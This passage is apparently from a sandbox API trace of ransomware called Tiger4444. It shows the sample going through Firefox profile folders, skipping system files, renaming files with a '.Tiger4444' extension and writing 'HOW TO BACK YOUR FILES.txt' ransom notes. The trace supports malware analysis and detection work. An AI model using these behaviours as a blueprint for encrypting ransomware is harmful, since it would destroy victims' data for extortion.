hTemplateFile=0x0) returned 0x2c8 [0051.764] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.764] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14321690447) returned 1 [0051.764] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=6538) returned 1 [0051.764] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0051.764] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0051.764] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1c90, lpName=0x0) returned 0x2a4 [0051.765] MapViewOfFile (hFileMappingObject=0x2a4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1c90) returned 0xbe0000 [0051.769] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc8d0f8 [0051.769] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0051.769] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d0f8 | out: hHeap=0xc50000) returned 1 [0051.769] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0051.769] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0051.769] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0051.769] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0051.769] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0051.769] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14322247250) returned 1 [0051.769] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0051.769] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0051.770] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.770] CloseHandle (hObject=0x2a4) returned 1 [0051.770] CloseHandle (hObject=0x2c8) returned 1 [0051.770] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4.Tiger4444") returned 178 [0051.770] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4.tiger4444"), dwFlags=0x1) returned 1 [0051.771] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8403501, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb8403501, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb8403501, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1a68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4", cAlternateFileName="15CA1A~1.JSO")) returned 1 [0051.771] lstrcmpiW (lpString1="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.771] lstrcmpiW (lpString1="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.771] lstrcmpiW (lpString1="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4", lpString2="Tiger4444.exe") returned -1 [0051.771] lstrcmpiW (lpString1="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4", lpString2=".") returned 1 [0051.771] lstrcmpiW (lpString1="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4", lpString2="..") returned 1 [0051.771] lstrcmpiW (lpString1="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4", lpString2="windows") returned -1 [0051.771] lstrcmpiW (lpString1="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4", lpString2="bootmgr") returned -1 [0051.771] lstrcmpiW (lpString1="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4", lpString2="pagefile.sys") returned -1 [0051.771] lstrcmpiW (lpString1="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4", lpString2="boot") returned -1 [0051.771] lstrcmpiW (lpString1="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4", lpString2="ids.txt") returned -1 [0051.771] lstrcmpiW (lpString1="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4", lpString2="NTUSER.DAT") returned -1 [0051.771] lstrcpyW (in: lpString1=0x30aeb7a, lpString2="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4" | out: lpString1="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4") returned="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4" [0051.771] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4", dwFileAttributes=0x0) returned 1 [0051.771] lstrlenW (lpString="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4") returned 63 [0051.771] lstrlenW (lpString="Tiger4444") returned 9 [0051.771] lstrcmpiW (lpString1="n.jsonlz4", lpString2="Tiger4444") returned -1 [0051.771] lstrlenW (lpString=".dll") returned 4 [0051.771] lstrcmpiW (lpString1="nlz4", lpString2=".dll") returned 1 [0051.771] lstrlenW (lpString=".lnk") returned 4 [0051.772] lstrcmpiW (lpString1="nlz4", lpString2=".lnk") returned 1 [0051.772] lstrlenW (lpString=".ini") returned 4 [0051.772] lstrcmpiW (lpString1="nlz4", lpString2=".ini") returned 1 [0051.772] lstrlenW (lpString=".sys") returned 4 [0051.772] lstrcmpiW (lpString1="nlz4", lpString2=".sys") returned 1 [0051.772] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0051.772] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.772] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14322540863) returned 1 [0051.772] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=6760) returned 1 [0051.772] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0051.772] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0051.773] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1d70, lpName=0x0) returned 0x2a4 [0051.775] MapViewOfFile (hFileMappingObject=0x2a4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1d70) returned 0xbe0000 [0051.782] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc8d0f8 [0051.782] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0051.782] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d0f8 | out: hHeap=0xc50000) returned 1 [0051.782] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0051.782] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0051.782] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0051.782] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0051.782] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0051.783] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14323563975) returned 1 [0051.783] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0051.783] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0051.783] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.783] CloseHandle (hObject=0x2a4) returned 1 [0051.783] CloseHandle (hObject=0x2c8) returned 1 [0051.783] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4.Tiger4444") returned 178 [0051.783] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4.tiger4444"), dwFlags=0x1) returned 1 [0051.784] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8403501, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb8403501, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb8403501, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1a68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4", cAlternateFileName="15CA1A~1.JSO")) returned 0 [0051.784] FindClose (in: hFindFile=0xc72e88 | out: hFindFile=0xc72e88) returned 1 [0051.784] lstrcpyW (in: lpString1=0x30aeb7a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.784] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.784] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0051.784] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.786] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.786] CloseHandle (hObject=0x2c8) returned 1 [0051.786] CloseHandle (hObject=0x2ac) returned 1 [0051.786] GetCurrentThreadId () returned 0xfa8 [0051.786] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66668 [0051.786] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes" [0051.786] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc88aa8 | out: hHeap=0xc50000) returned 1 [0051.786] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66660 | out: hHeap=0xc50000) returned 1 [0051.786] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes" [0051.786] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\" [0051.786] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\.BFC0E91B00AE8A0620D3" [0051.786] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\crashes\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.787] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.790] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.791] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.792] CloseHandle (hObject=0x2ac) returned 1 [0051.792] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes") returned 81 [0051.792] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.792] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x2923a75e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x83e1c38b, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73088 [0051.792] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.793] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.793] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.793] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.793] FindNextFileW (in: hFindFile=0xc73088, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x2923a75e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x83e1c38b, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.793] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.793] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.793] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.793] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.793] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.793] FindNextFileW (in: hFindFile=0xc73088, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83e1c38b, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83e1c38b, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83e42458, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.793] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.793] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.793] FindNextFileW (in: hFindFile=0xc73088, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfb00785a, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="events", cAlternateFileName="")) returned 1 [0051.793] lstrcmpiW (lpString1="events", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.793] lstrcmpiW (lpString1="events", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.793] lstrcmpiW (lpString1="events", lpString2="Tiger4444.exe") returned -1 [0051.793] lstrcmpiW (lpString1="events", lpString2=".") returned 1 [0051.793] lstrcmpiW (lpString1="events", lpString2="..") returned 1 [0051.793] lstrcmpiW (lpString1="events", lpString2="windows") returned -1 [0051.793] lstrcmpiW (lpString1="events", lpString2="bootmgr") returned 1 [0051.793] lstrcmpiW (lpString1="events", lpString2="pagefile.sys") returned -1 [0051.793] lstrcmpiW (lpString1="events", lpString2="boot") returned 1 [0051.793] lstrcmpiW (lpString1="events", lpString2="ids.txt") returned -1 [0051.793] lstrcmpiW (lpString1="events", lpString2="NTUSER.DAT") returned -1 [0051.793] lstrcpyW (in: lpString1=0x30aeb4c, lpString2="events" | out: lpString1="events") returned="events" [0051.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc665c0 [0051.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xb2) returned 0xc73f50 [0051.793] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc665c8 | out: ListHead=0xc66828, ListEntry=0xc665c8) returned 0xc663a8 [0051.793] FindNextFileW (in: hFindFile=0xc73088, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2923a75e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0x2923a75e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x2923a75e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x42, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="store.json.mozlz4", cAlternateFileName="STOREJ~1.MOZ")) returned 1 [0051.794] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.794] lstrcmpiW (lpString1="store.json.mozlz4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.794] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="Tiger4444.exe") returned -1 [0051.794] lstrcmpiW (lpString1="store.json.mozlz4", lpString2=".") returned 1 [0051.794] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="..") returned 1 [0051.794] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="windows") returned -1 [0051.794] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="bootmgr") returned 1 [0051.794] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="pagefile.sys") returned 1 [0051.794] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="boot") returned 1 [0051.794] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="ids.txt") returned 1 [0051.794] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="NTUSER.DAT") returned 1 [0051.794] lstrcpyW (in: lpString1=0x30aeb4c, lpString2="store.json.mozlz4" | out: lpString1="store.json.mozlz4") returned="store.json.mozlz4" [0051.794] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\store.json.mozlz4", dwFileAttributes=0x0) returned 1 [0051.794] lstrlenW (lpString="store.json.mozlz4") returned 17 [0051.794] lstrlenW (lpString="Tiger4444") returned 9 [0051.794] lstrcmpiW (lpString1="on.mozlz4", lpString2="Tiger4444") returned -1 [0051.794] lstrlenW (lpString=".dll") returned 4 [0051.794] lstrcmpiW (lpString1="zlz4", lpString2=".dll") returned 1 [0051.795] lstrlenW (lpString=".lnk") returned 4 [0051.795] lstrcmpiW (lpString1="zlz4", lpString2=".lnk") returned 1 [0051.795] lstrlenW (lpString=".ini") returned 4 [0051.795] lstrcmpiW (lpString1="zlz4", lpString2=".ini") returned 1 [0051.795] lstrlenW (lpString=".sys") returned 4 [0051.795] lstrcmpiW (lpString1="zlz4", lpString2=".sys") returned 1 [0051.795] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\store.json.mozlz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\crashes\\store.json.mozlz4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0051.795] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.795] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14324808583) returned 1 [0051.795] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=66) returned 1 [0051.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89950 [0051.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ea0 [0051.795] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x2a4 [0051.797] MapViewOfFile (hFileMappingObject=0x2a4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0xbe0000 [0051.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc8d0f8 [0051.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0051.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d0f8 | out: hHeap=0xc50000) returned 1 [0051.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0051.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0051.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0051.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0051.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0051.799] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14325174796) returned 1 [0051.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89950 | out: hHeap=0xc50000) returned 1 [0051.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ea0 | out: hHeap=0xc50000) returned 1 [0051.799] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.799] CloseHandle (hObject=0x2a4) returned 1 [0051.799] CloseHandle (hObject=0x2c8) returned 1 [0051.799] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\store.json.mozlz4.Tiger4444") returned 109 [0051.799] MoveFileExW 